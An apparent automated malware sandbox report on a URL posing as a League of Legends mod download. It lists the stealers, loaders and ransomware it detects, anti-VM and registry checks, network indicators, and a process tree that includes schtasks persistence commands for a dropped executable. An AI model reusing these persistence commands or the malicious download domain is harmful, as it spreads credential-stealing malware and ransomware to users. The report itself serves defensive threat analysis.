Analysis Overview
Threat Level: Known bad
The file https://duikosgreec.pro/?param=league+of+legends+first+person+mod was found to be: Known bad.
Malicious Activity Summary
Stealc
Glupteba
Detect ZGRat V1
RisePro
RedLine payload
SmokeLoader
RedLine
Glupteba payload
Djvu Ransomware
Detected Djvu ransomware
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Stops running service(s)
Modifies Windows Firewall
Creates new service(s)
Downloads MZ/PE file
Checks BIOS information in registry
Unexpected DNS network traffic destination
Loads dropped DLL
Reads user/profile data of web browsers
Identifies Wine through registry keys
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks installed software on the system
Checks whether UAC is enabled
Drops file in System32 directory
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Detects Pyinstaller
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-21 11:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-21 11:15
Reported
2024-02-21 11:18
Platform
win11-20240214-en
Max time kernel
72s
Max time network
224s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Desktop\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Desktop\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Desktop\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Desktop\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\file_release_v3.rar:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duikosgreec.pro/?param=league+of+legends+first+person+mod
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\file_release_v3.rar"
C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe
"C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe
"C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe"
C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe
"C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe"
C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
"C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe
"C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe"
C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe
"C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe"
C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
"C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe"
C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe
"C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe"
C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp" /SL5="$B00D6,4268356,54272,C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5600 -ip 5600
C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
"C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe
"C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe
"C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe"
C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe
"C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe"
C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe
"C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe"
C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe
"C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe"
C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe
"C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe"
C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
"C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7A0D.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
"C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -s
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe
"C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe"
C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe
"C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 372
C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
"C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5612 -ip 5612
C:\Users\Admin\AppData\Local\Temp\7zS8A2A.tmp\Install.exe
.\Install.exe /UPdidFN "525403" /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5176 -ip 5176
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
